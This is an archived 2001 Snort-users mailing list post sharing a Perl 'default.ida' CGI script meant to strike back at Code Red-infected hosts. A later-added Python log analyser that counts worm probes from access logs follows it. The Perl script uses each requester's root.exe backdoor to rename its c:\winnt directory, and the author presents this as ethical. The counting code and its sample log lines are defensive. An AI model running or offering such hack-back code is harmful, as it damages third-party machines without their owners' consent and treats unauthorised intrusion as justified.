[Snort-users] Code Red attacks

F.M. Taylor root at ...28...
Tue Sep 18 07:50:06 EDT 2001


This is a "default.ida" script that I am using on a server somewhere.  It
seems to be working, at least some of the time.

Ethical??  Well, it is a script, on a server that I own, and the only way
it will do anything is if you try to access it.  It doesn't actively look
for anything, it just waits for a service request, and then performs the
requested service.  If you don't want this service, don't request it.

If there is a better way to deliver this service after it has been
requested (more elegant code), let me know. 



root at ...2642...:/htdocs# cat default.ida

#!/usr/bin/perl
#
$ipAddress = $ENV{'REMOTE_ADDR'};
#
$newUrl = $ipAddress."/scripts/root.exe?ren+c:\\winnt+c:\\codered\";
#
system("TERM=vt100;export TERM;lynx \'http://$ipAddress/scripts/root.exe?ren+c:\\winnt+c:\\codered\' >>codered.txt");
#
print "Content-type: text/html\n\n";
#
print "<HTML><HEAD>";
print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;url=http://$newUrl\">";
print "</HEAD><BODY></BODY>";
print "</HTML>";
#
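
A passive counterpart to the script above, as an added example that is not part of the original post: instead of acting on the requesting host, it tallies default.ida and /scripts/root.exe requests per source address from web server access logs, so infected hosts can be reported or blocked. It assumes Apache common log format; the function names are hypothetical, the sample lines are constructed, and the N/X padding distinction is background knowledge rather than something stated in the post.

```python
import re
from collections import defaultdict

# Apache common/combined log format: host ident user [time] "METHOD URI PROTO" ...
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (?P<uri>\S+)[^"]*"')
# A long run of one padding letter opens the worm's default.ida query string.
PAD_RE = re.compile(r"([NX])\1{50,}")

def classify(uri):
    """Return a label for worm-related requests, or None for other traffic."""
    path, _, query = uri.partition("?")
    path = path.lower()
    if path.endswith("/default.ida"):
        m = PAD_RE.match(query)
        if m is None:
            return "default.ida request"
        # Background, not from the post: N padding was reported for the
        # original Code Red, X padding for Code Red II.
        return "Code Red probe" if m.group(1) == "N" else "Code Red II probe"
    if path.endswith("/scripts/root.exe"):
        return "root.exe request"
    return None

def summarize(lines):
    """Count labelled requests per source address."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a parseable access-log line
        label = classify(m.group("uri"))
        if label:
            hits[m.group("src")][label] += 1
    return {src: dict(counts) for src, counts in hits.items()}

# Constructed sample lines (documentation addresses, shortened payloads).
SAMPLE = [
    '192.0.2.10 - - [18/Sep/2001:07:41:02 -0400] "GET /default.ida?' + "N" * 224 + '%u9090 HTTP/1.0" 200 -',
    '198.51.100.7 - - [18/Sep/2001:07:42:10 -0400] "GET /default.ida?' + "X" * 224 + '%u9090 HTTP/1.0" 200 -',
    '198.51.100.7 - - [18/Sep/2001:07:42:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290',
    '198.51.100.7 - - [18/Sep/2001:07:42:12 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290',
    '203.0.113.5 - - [18/Sep/2001:07:43:00 -0400] "GET /index.html HTTP/1.0" 200 1043',
    'truncated or malformed line',
]

if __name__ == "__main__":
    for src, counts in sorted(summarize(SAMPLE).items()):
        print(src, counts)
```
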
